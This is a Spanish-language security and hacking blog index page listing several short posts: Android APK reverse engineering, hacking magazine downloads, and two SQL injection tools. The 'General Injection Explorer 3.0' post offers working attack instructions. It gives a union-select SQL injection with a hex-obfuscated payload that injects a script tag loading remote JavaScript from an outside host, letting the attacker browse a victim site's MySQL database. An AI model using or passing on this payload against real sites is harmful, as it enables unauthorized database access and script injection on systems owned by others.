content top

Ingeniería inversa básica en Android

Publicado por en sep 13, 2011 en Moviles | Comments 0 comentarios  

Los siguientes documentos son una introducción a la ingeniería inversa de aplicaciones hechas para Android (ejecutables con extensión .APK) escritos por mi amigo Ghost, en los que se describe el funcionamiento del Android SDK y también se explica como decompilar dichos ejecutables para modificarlos y luego volver a “recompilarlos” con algunas herramientas  existentes. Por el momento solo son dos papers, estaré informando la publicación de los próximos.

TOMO I

Ingeniería inversa básica en android

Leer mas

General Injection Explorer 3.0

Publicado por en feb 16, 2010 en Toolz | Comments 0 comentarios  

Anteriormente publique SQL-PwnZ 1.1 una herramienta para realizar inyecciones SQL. La que les traigo hoy es más amigable y solo necesitan usar el navegador, se llama General Injection Explorer 3.0 y fue creada por PonyMagic.

[?] ¿Que es?
Básicamente es un explorador de bases de datos MySQL via SQLi, “incrustado” en la inyección.

[!] ¿Que tiene la versión 3.0?
[+] Codeado desde 0.
[+] Bypasseo de “illegal operation”, y limite de group_concat_max_len.
[+] Mejor manejo de CSS && DIVS.
[+] Peticiones realizadas con AJAX.
[+] Nueva forma de ver tablas, MUCHO mas ordenadas.

[?] ¿Como se usa?
En una SQLi, unís otro select y marcas las columnas ( id=-1 union select 1,2,3,4,5 )
En un valor que printee (que se muestre en la web), simplemente copias y pegas el código de la GIE.

(0x3c736372697074207372633d22687474703a2f2f7669727475782e636f6d2e61722f4749452f5f2e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e)

Ejemplo:
Normal: tales.php?id=-1 union select 0,1,2,3,4,5,6,7,8,9–
Con GIE: tales.php?id=-1 union select 0,1,(0x3c736372697074207372633d22687474703a2f2f7669727475782e636f6d2e61722f4749452f5f2e6a7322207479
70653d22746578742f6a617661736372697074223e3c2f7363726970743e),3,4,5,6,7,8,9–

En el siguiente gif pueden ver como funciona:

Leer mas

Colección de Ezines

Publicado por en dic 4, 2009 en Revistas | Comments 0 comentarios  

Tienen disponible una colección de revistas sobre temáticas como Hacking, programación, diseño y muchas cosas más dividas en países, la gran mayoría aportadas en DragonJAR y otras que e subido yo. Poco a poco iré actualizando la lista, espero las aprovechen.

Ver colección de Ezines

Leer mas

SQL-PwnZ 1.1 – Herramienta para SQL Injection

Publicado por en nov 17, 2009 en Seguridad, Toolz | Comments 0 comentarios  

Comparto con uds una herramienta muy útil para realizar inyecciones SQL.

Leer mas

Todas las revistas HackxCrack + Practicas + Comos + Programas. En un solo pack.

Publicado por en oct 26, 2009 en Revistas, Seguridad | Comments 0 comentarios  

Hace algún tiempo había subido este paquete pero por cuestiones de ancho de banda, me vi en la obligación de quitarlo. Esta vez lo subí a adrive, para no tener problemas. El paquete contiene todas las revistas HackxCrack (PC paso a paso) con las practicas, programas y comos. En total 467 MB.

Descargar Revistas HackxCrack Gratis

Descargar Revistas en varias partes – RapidShare

Gracias a nacho87 por subirlo a Rapidshare.

Leer mas
content top